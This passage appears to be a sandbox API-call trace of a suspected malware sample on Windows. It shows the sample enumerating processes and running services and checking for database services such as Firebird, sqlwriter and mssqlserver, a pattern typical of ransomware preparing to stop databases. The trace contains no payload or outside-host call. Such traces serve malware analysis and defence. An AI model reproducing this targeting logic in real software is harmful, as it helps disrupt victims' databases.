lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.511] lstrlenW (lpString="svchost.exe") returned 11 [0199.511] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.512] lstrlenW (lpString="svchost.exe") returned 11 [0199.512] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.512] lstrlenW (lpString="svchost.exe") returned 11 [0199.512] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.513] lstrlenW (lpString="svchost.exe") returned 11 [0199.513] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.514] lstrlenW (lpString="svchost.exe") returned 11 [0199.514] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0199.515] lstrlenW (lpString="spoolsv.exe") returned 11 [0199.515] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.516] lstrlenW (lpString="svchost.exe") returned 11 [0199.516] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0199.516] lstrlenW (lpString="audiodg.exe") returned 11 [0199.517] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0199.517] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0199.517] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0199.518] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0199.518] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0199.519] lstrlenW (lpString="Memory Compression") returned 18 [0199.520] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0199.520] lstrlenW (lpString="sihost.exe") returned 10 [0199.520] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.521] lstrlenW (lpString="svchost.exe") returned 11 [0199.521] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0199.522] lstrlenW (lpString="msoia.exe") returned 9 [0199.522] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0199.523] lstrlenW (lpString="taskhostw.exe") returned 13 [0199.523] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0199.524] lstrlenW (lpString="explorer.exe") returned 12 [0199.524] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0199.525] lstrlenW (lpString="SearchUI.exe") returned 12 [0199.525] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0199.525] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0199.525] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0199.526] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0199.526] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0199.527] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0199.527] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0199.528] lstrlenW (lpString="hgaibc.exe") returned 10 [0199.528] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 0 [0199.529] CloseHandle (hObject=0x394) returned 1 [0199.529] Sleep (dwMilliseconds=0x1f4) [0200.195] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6bee58 [0200.196] EnumServicesStatusExW (in: hSCManager=0x6bee58, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 0 [0200.198] GetLastError () returned 0xea [0200.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1cb6) returned 0x6d97a8 [0200.199] EnumServicesStatusExW (in: hSCManager=0x6bee58, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6d97a8, cbBufSize=0x1cb6, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6d97a8, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 1 [0200.200] CloseServiceHandle (hSCObject=0x6bee58) returned 1 [0200.200] lstrlenW (lpString="Appinfo") returned 7 [0200.200] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0200.200] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0200.200] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0200.200] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0200.200] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0200.201] lstrlenW (lpString="AppXSvc") returned 7 [0200.201] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0200.201] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0200.201] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0200.201] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0200.201] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0200.201] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0200.201] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0200.201] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0200.201] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0200.201] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0200.201] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0200.201] lstrlenW (lpString="Audiosrv") returned 8 [0200.201] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0200.201] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0200.201] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0200.201] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0200.201] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0200.201] lstrlenW (lpString="BFE") returned 3 [0200.201] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0200.201] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0200.201] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0200.201] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0200.201] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0200.201] lstrlenW (lpString="BITS") returned 4 [0200.201] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0200.201] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0200.201] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0200.201] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0200.201] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0200.202] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0200.202] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0200.202] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0200.202] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0200.202] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0200.202] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0200.202] lstrlenW (lpString="CDPSvc") returned 6 [0200.202] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0200.202] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0200.202] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0200.202] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0200.202] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0200.202] lstrlenW (lpString="ClickToRunSvc") returned 13 [0200.202] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0200.202] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0200.202] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0200.202] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0200.202] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0200.202] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0200.202] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0200.202] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0200.202] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0200.202] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0200.202] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0200.202] lstrlenW (lpString="CryptSvc") returned 8 [0200.202] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0200.202] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0200.202] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0200.202] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0200.203] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0200.203] lstrlenW (lpString="DcomLaunch") returned 10 [0200.203] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0200.203] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0200.203] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0200.203] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0200.203] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0200.203] lstrlenW (lpString="DeviceAssociationService") returned 24 [0200.203] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0200.203] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0200.203] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0200.203] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0200.203] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0200.203] lstrlenW (lpString="Dhcp") returned 4 [0200.203] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0200.203] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0200.203] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0200.203] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0200.203] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0200.203] lstrlenW (lpString="Dnscache") returned 8 [0200.203] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0200.203] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0200.203] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0200.203] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0200.203] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0200.203] lstrlenW (lpString="DPS") returned 3 [0200.203] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0200.203] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0200.203] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0200.203] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0200.204] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0200.204] lstrlenW (lpString="DusmSvc") returned 7 [0200.204] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0200.204] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0200.204] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0200.204] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0200.204] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0200.204] lstrlenW (lpString="EventLog") returned 8 [0200.204] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0200.204] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0200.204] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0200.204] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0200.204] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0200.204] lstrlenW (lpString="EventSystem") returned 11 [0200.204] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0200.204] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0200.204] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0200.204] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0200.204] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0200.204] lstrlenW (lpString="FontCache") returned 9 [0200.204] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0200.204] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0200.204] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0200.204] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0200.204] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0200.204] lstrlenW (lpString="gpsvc") returned 5 [0200.204] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0200.204] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0200.204] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0200.205] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0200.205] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0200.205] lstrlenW (lpString="iphlpsvc") returned 8 [0200.205] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0200.205] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0200.205] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0200.205] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0200.205] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0200.205] lstrlenW (lpString="KeyIso") returned 6 [0200.205] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0200.205] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0200.205] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0200.205] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0200.205] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0200.205] lstrlenW (lpString="LanmanServer") returned 12 [0200.205] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0200.205] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0200.205] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0200.205] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0200.205] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0200.205] lstrlenW (lpString="LanmanWorkstation") returned 17 [0200.205] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0200.205] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0200.205] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0200.205] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0200.205] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0200.205] lstrlenW (lpString="lfsvc") returned 5 [0200.205] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0200.205] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0200.206] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0200.206] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0200.206] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0200.206] lstrlenW (lpString="lmhosts") returned 7 [0200.206] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0200.206] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0200.206] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0200.206] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0200.206] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0200.206] lstrlenW (lpString="LSM") returned 3 [0200.206] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0200.206] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0200.206] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0200.206] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0200.206] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0200.206] lstrlenW (lpString="MpsSvc") returned 6 [0200.206] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0200.206] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0200.206] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0200.206] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0200.206] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0200.206] lstrlenW (lpString="NcbService") returned 10 [0200.206] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0200.206] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0200.206] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0200.206] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0200.206] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0200.206] lstrlenW (lpString="netprofm") returned 8 [0200.206] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0200.206] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0200.207] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0200.207] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0200.207] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0200.207] lstrlenW (lpString="NgcSvc") returned 6 [0200.207] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0200.207] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0200.207] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0200.207] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0200.207] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0200.207] lstrlenW (lpString="NlaSvc") returned 6 [0200.207] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0200.207] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0200.207] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0200.207] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0200.207] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0200.207] lstrlenW (lpString="nsi") returned 3 [0200.207] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0200.207] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0200.207] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0200.207] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0200.207] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0200.207] lstrlenW (lpString="PcaSvc") returned 6 [0200.207] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0200.207] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0200.207] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0200.207] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0200.207] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0200.207] lstrlenW (lpString="PlugPlay") returned 8 [0200.207] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0200.208] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0200.208] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0200.208] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0200.208] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0200.208] lstrlenW (lpString="Power") returned 5 [0200.208] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", 